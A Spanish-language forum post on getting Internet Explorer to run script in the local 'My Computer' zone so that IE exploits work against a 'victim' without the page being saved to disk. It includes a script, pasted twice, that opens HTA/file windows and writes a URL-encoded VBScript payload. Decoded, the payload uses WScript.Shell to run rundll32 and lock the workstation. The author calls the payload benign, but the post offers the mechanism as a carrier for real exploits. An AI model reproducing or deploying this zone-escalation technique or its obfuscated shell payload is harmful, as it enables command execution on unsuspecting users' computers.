Autor
Citar
..bla..bla...
also we would like to inform you that the bug you reported the day 09-11-2005
..bla..bla..
it has been cataloged as Low Risk
..bla..bla..
there wont be any type reward
..bla..bla..
Thank you for your understanding.
Por eso vuelvo a abrir el tema.also we would like to inform you that the bug you reported the day 09-11-2005
..bla..bla..
it has been cataloged as Low Risk
..bla..bla..
there wont be any type reward
..bla..bla..
Thank you for your understanding.
Muchos Exploits para IExplorer necesitan de que el exploit este en la zona %MYCOMPUTER% osea en disco duro y no en red.. pero pues amenos de que convensas a tu victima de guardar la pagina y despues ejecutarla denuevo, no servira de mucho. ahora antes de decirme que se guarda en tu pc todo el contenido web, deja te digo que lo se pero iexplorer sabe identificar cual es remoto y cual es local osea no sirve cache, ni historial ni favoritos..
pero como ejecutarlo?
pues haber si entienden el siguiente codigo:
Código:
<script>
document.local = "%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0D%0A%53%65%74%20%6F%73%73%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%63%74%28%22%57%73%63%72%69%70%74%2E%53%68%65%6C%6C%22%29%0D%0A%6F%73%73%2E%52%75%6E%20%22%72%75%6E%64%6C%6C%33%32%2E%65%78%65%20%75%73%65%72%33%32%2E%64%6C%6C%2C%4C%6F%63%6B%57%6F%72%6B%53%74%61%74%69%6F%6E%22%0D%0A%3C%2F%73%63%72%69%70%74%3E";
var v=open("file://c:/winnt/system32/no.hta","roc");
v.document.write('<img src="javascript:self.location.href='+"'file://c:/c.hta'"+'">');
open("javascript:document.write(unescape('"+escape(document.local)+"'));location.reload();","roc");
</script>
document.local = "%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0D%0A%53%65%74%20%6F%73%73%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%63%74%28%22%57%73%63%72%69%70%74%2E%53%68%65%6C%6C%22%29%0D%0A%6F%73%73%2E%52%75%6E%20%22%72%75%6E%64%6C%6C%33%32%2E%65%78%65%20%75%73%65%72%33%32%2E%64%6C%6C%2C%4C%6F%63%6B%57%6F%72%6B%53%74%61%74%69%6F%6E%22%0D%0A%3C%2F%73%63%72%69%70%74%3E";
var v=open("file://c:/winnt/system32/no.hta","roc");
v.document.write('<img src="javascript:self.location.href='+"'file://c:/c.hta'"+'">');
open("javascript:document.write(unescape('"+escape(document.local)+"'));location.reload();","roc");
</script>
que hace esto?
ejecuta como local lo que este en document.local, necesitas hacerle un escape() al codigo antes de colocarlo ahi.
copien este codigo en bloc de notas y guardenlo como un archivo html.. RECUERDEN DESHABILITAR BLOQUEADOR DE POPUPS.
ahora, el codigo que puse aqui como ejemplo no es exploit.. es un comando legal, por eso les sacara advertencia, no coloque exploits.. porque no lo considere prudente.
Saludos!!
En línea
